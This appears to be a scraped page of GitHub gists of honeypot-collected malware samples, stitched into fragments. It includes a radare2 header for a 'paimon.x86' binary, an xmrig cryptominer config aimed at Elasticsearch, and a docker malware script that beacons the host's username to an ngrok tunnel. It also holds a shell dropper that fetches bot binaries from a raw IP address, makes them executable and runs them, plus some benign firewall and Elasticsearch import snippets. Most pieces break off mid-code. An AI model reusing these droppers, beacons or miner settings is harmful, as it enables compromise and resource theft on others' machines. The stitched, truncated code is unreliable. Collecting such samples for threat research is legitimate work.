

A1/knnUWULU2NiOgmM//YB9bTMpU+Zg3JfBube+UUTbHcbV0/akpEn/3VnZb7lYTDCxazq0efcDarXzQK6X1Xnk4pAYgqCOhlLjjqhSLWk6Uy+c8Fd0Q69dhMG4neFv2HbTohqdIrv+5iixaKhxP3lMJVW5TAiuRJrHiMA5z4MxgTX89Oz8jM+S5bcQhKVPfk8LrRLFk2Zlp7hj68e2Cqaa/wQC8osJPLm/Y/ejJgjQg4WpHJ+bEEZWIRmr0dhsZLYSWBn1FEMzv43KkrDAmb1gM9G63Llxj8MfZlOcZXcnDgn7e4ytoL56mkcBUOEYmG/5JJ2OQvIkcheq+77rztisgsPxSVdo+KQyVbYrCvFCHb2Eh
A1/kzSIfAKdirHqv4ILCwBmTbiutpRbIQIGZJ38p5ugwNTjDYvnj73yC/sZbhoIXG/x4OwI4SgwijkqkiBELYSBf13gS5Y1pxnswZuhytjkpsBpBUCmsggE27TRtm9BD9V+BuQOIlPigmmJ6G+4dWnc4kCNkdh/4ga7Ym2AzuPDK0TgDkyds4OSkh271uGC0Q6WC0YleKGaF6oi1rMSUhI8NqzBtVTwNafUR49t0LxArB9DQuSzbGVqXBnPZpSKsfkq0Wv+vaDekCouZ6vFQ2YPXr8IxRXoxxGHgJVuANxPPb3jzHcSgo76BX2i4OLNeS1k1lZqmgUc7qz7XgNxlnTAKaSAu4kLjgZkrE8tpFU3LqFRece8D84Sy
A16zzHwSVQTcEZqvZ61pmw0hpca/WzVMF2kP89s5/9I4y2J47hcQidU1h4pzyZdA0F5QtAzrEKkveIpAQEPdX3/74CBVf5qE49Dmy6Od4YQgpEoX2KXGrHUJC+HsVZUr5efGu1H1aLiZH1Y/0mxvzVRuYZDN01jLAXDhTEOfFbAarX86B5ckT/3VdO2gdNvvku/26rHdLC0SbiwyfElwCz9SMePTI+TT5hlnmh2oTwzy5+UwUUBVwJAAU2LkT2OAIOzdPpWVvSLYSKRqP7xaPI
MD5 (/Users/remco/Downloads/paimon.x86) = 5efce325c5aa2fa11553bf6a4bd94b74
arch x86
baddr 0x8048000
binsz 37184
bintype elf
bits 32
canary false
sanitiz false
class ELF32
nl5887 / config.json
Last active November 29, 2018 20:36
Targeting Elasticsearch
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 3, // donate level, minimum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 65, // maximum CPU usage for automatic mode; the limiting factor is usually CPU cache, not this option.
function d() {
// Deobfuscation helper: converts a hex-encoded string back into text.
// The encoding passed to toString() is UTF-8, which is also Buffer's default.
// Presumably applied to the entries of the `data` array that follows; the
// array contents are not visible here, so that is an assumption to confirm.
function decode(codedString) {
  const rawBytes = Buffer.from(codedString, "hex");
  return rawBytes.toString("utf8");
}
var data = ["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
nl5887 / ngrok.sh
Last active April 30, 2020 09:46
docker malware (collected with honeytrap)
# Beacon endpoint: an ngrok tunnel used as the host for the report URL that
# reportinfo() below builds ("$HOST/m?..."). Treat this hostname as an indicator
# of compromise rather than as configuration to reuse.
export HOST="http://0c9afa50.ngrok.io"
# Fixed 32-hex-digit value sent as the `r=` query parameter by reportinfo();
# looks like a campaign or sample identifier — its meaning is not visible here.
export RIP="97cc76838c10360ea07e82b225d1d306"
reportinfo() {
local _usr="$(whoami 2>/dev/null)"
local _url="$HOST/m?o=$(pido)&r=${RIP}&t=${PROCS}&l=d&u=${_usr}"
if type "wget" >/dev/null 2>&1 ; then
wget -q "${_url}" >/dev/null 2>&1
elif type "curl" >/dev/null 2>&1 ; then
# Mitigation: drop inbound traffic from offending addresses via an ipset-backed rule,
# so that adding or removing an address never requires touching the iptables ruleset.
# "iphash" is the legacy ipset type name for a hash keyed by single IPv4 addresses
# (modern ipset accepts it as an alias of hash:ip).
ipset create blocklist iphash
# One rule consults the set for every inbound packet's source address.
iptables -A INPUT -m set --match-set blocklist src -j DROP
# Add each offending address; {ip} is a placeholder for the real value.
# NOTE(review): INPUT only covers traffic addressed to the host itself. Traffic
# forwarded to Docker containers is filtered in the DOCKER-USER chain instead
# (see the DOCKER-USER rules below), so a blocklist meant for containers needs a
# matching rule there.
ipset add blocklist {ip}
-A DOCKER-USER -i eth0 -j DROP
-A DOCKER-USER -j RETURN
nl5887 / gist:d994f61adf9b052d48ad3f0c16c5b130
Created September 10, 2018 14:17
import record-based JSON into Elasticsearch
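# Bulk-import one JSON record per line from the file json3 into Elasticsearch.
# For every input object, jq -c emits an action line ({"index": ...}) followed by
# the document itself with a "firmware" field added — the newline-delimited
# action/document pairs the _bulk API expects. jq reads the file directly, which
# removes the needless `cat` stage; curl keeps -s (no progress meter) but adds -S
# so transport errors are still reported instead of being swallowed.
# NOTE: the request goes over plain HTTP to a local instance with no authentication;
# only suitable for a loopback/dev cluster.
jq -c '{ "index": {"_index": "bang", "_type": "file"}}, . + { "firmware": "json3" }' json3 | curl -sS -H "Content-Type: application/json" -XPUT "http://127.0.0.1:9200/_bulk" --data-binary @-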
#!/bin/sh
# Analyst notes (code unchanged): multi-architecture dropper collected by a honeypot.
# It tries one payload name per CPU architecture in turn; whichever binary matches
# the host runs, the non-matching ones would fail to execute.
n="arm.bot.le mips.bot.be mipsel.bot.le arm7.bot.le x86_64.bot.le i586.bot.le i686.bot.le"
# Payload host: a bare IPv4 address reached over plain HTTP (IoC; used in the wget line below).
http_server="95.215.62.169"
for a in $n
# Copies the system shell to the payload name, then truncates it with `>$a` —
# presumably to start from a fresh file; the download below overwrites it anyway.
cp /system/bin/sh $a
>$a
# Fetches the architecture-specific payload with busybox wget (-O - writes to stdout,
# redirected into $a).
busybox wget http://$http_server/$a -O -> $a
# Marks the file world-readable/writable/executable and runs it. The sequence
# "download from raw-IP URL -> chmod 777 -> execute" in /system/bin-style paths is a
# strong detection signal for endpoint and egress monitoring.
chmod 777 $a
./$a
done
nl5887 / forward.go
Last active July 2, 2018 12:20
Connects two outgoing connections
package main
import (
"fmt"
"io"
"net"
"os"
)
func main() {